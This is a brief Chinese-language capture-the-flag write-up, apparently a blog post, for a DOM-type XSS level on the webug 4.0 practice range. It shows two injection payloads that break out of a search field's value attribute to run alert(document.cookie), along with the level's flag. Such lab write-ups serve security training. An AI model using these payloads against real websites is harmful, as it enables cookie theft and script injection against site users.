webug4.0DOM型xss-12
/*水题*/
打开链接寻找注入点,看到有一个搜索框,随便输入字符 asdasd 然后打开源码寻找刚才输入的位置
<input name="search" type="text" value="asdasd" required="">
我们输入的位置在value那里
两个方向闭合标签和不闭合标签
1. 输入" onmouseover=alert(document.cookie)># 弹窗成功
<input name="search" type="text" value="" onmouseover=alert(1)>#" required="">
2. 输入" > <script>alert(document.cookie)</script># 弹窗成功
<input name="search" type="text" value="" > <script>alert(document.cookie)</script>#" required="">
flag:uoijkhhnloh
转载注明来源:https://www.cnblogs.com/yuuki-aptx/
